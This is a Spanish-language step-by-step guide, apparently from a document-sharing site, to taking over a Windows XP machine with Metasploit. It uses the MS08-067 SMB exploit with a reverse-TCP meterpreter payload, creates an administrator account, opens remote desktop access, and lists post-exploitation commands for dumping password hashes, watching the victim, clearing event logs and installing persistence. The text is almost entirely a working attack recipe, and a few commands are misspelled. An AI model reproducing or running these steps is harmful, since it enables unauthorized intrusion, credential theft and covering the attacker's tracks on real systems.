Está en la página 1de 3

CONSEGUIR GUI EN XP CON METASPLOIT

1- Comprobar la máquina vulnerable, para hacerlo de forma rápida se utilizará nmap.

Sintaxis: nmap -O red/24 IP

2- Una vez comprobado, ejecutar la consola de Metasploit.

Sintaxis: msfconsole

3- Cargar el exploit. En este caso utilizamos uno que ataca al protocolo smb.

Sintaxis: search exploit/windows/smb

use exploit/windows/smb/ms08_067_netapi

4- Seleccionamos un PAYLOAD, se utilizará un meterpreter con conexión inversa.

Sintaxis: set PAYLOAD windows/meterpreter/reverse_tcp

5- Se coloca la IP local.

Sintaxis: set LHOST IP

6- Se coloca la IP remota.

Sintaxis: set RHOST IP

7- Comprobar que no queden campos vacíos (opcional).

Sintaxis: show options

Debe salir algo así:


Nota: los campos de las IP deben ser los vuestros

8- Lanzar el exploit.

Sintaxis: exploit

9- Una vez en meterpreter controlamos el sistema.

Sintaxis: getsystem

10- Una vez tenemos privilegios hay que crear un nuevo usuario.

sintaxis: run getgui -u usuario -p password

11- Obtenemos una shell en el sistema.

Sintaxis: shell

12- Elevar privilegios al usuario.

Sintaxis: net localgroups administradores usuario /add (Donde administradores es el nombre


del grupo de admins)

13- En una nueva pestaña de la terminal se utiliza la herramienta rdesktop.

Sintaxis: rdesktop -u usuario -p password IP

Y se abre una ventana con la GUI.

COMANDOS ÚTILES DE METERPRETER:

Para ver las aplicaciones instaladas:

meterpreter > run get_application_list

Actividad de la víctima: Si necesitamos saber si el usuario se encuentra delante de la pc nos


alcanza con ejecutar idletime para saber la cantidad segundos que el usuario no tuvo actividad.

meterpreter > Idletime

Obteniendo los hash de las contraseñas:


meterpreter > hasdump

Conocer información del sistema que hemos “atacado”:

meterpreter > sysinfo

Tomar una captura de pantalla de la víctima (como evidencia) ejecutamos:

meterpreter > screenshot

Administración del equipo Victima:

meterpreter > Reboot = Reinicia el equipo victima

meterpreter > Shutdown = Apaga el equipo victima

meterpreter > Kill = Sirve para “matar” procesos (podemos usar el comando previo PS para ver
todos los procesos que están corriendo)

Si por algún motivo queremos impedir que el usuario del sistema comprometido utilice el
mouse y/o el teclado, existe uictl que permite estas funcionalidades:

Para limpiar las huellas:

meterpreter > clearev

Ya que hemos borrado los eventos antes de “abandonar” la victima entonces también
podemos usar el comando persistance que permite a meterpreter anclarse al inicio del
sistema e intente establecer conexiones con la máquina atacante cada X tiempo:

También podría gustarte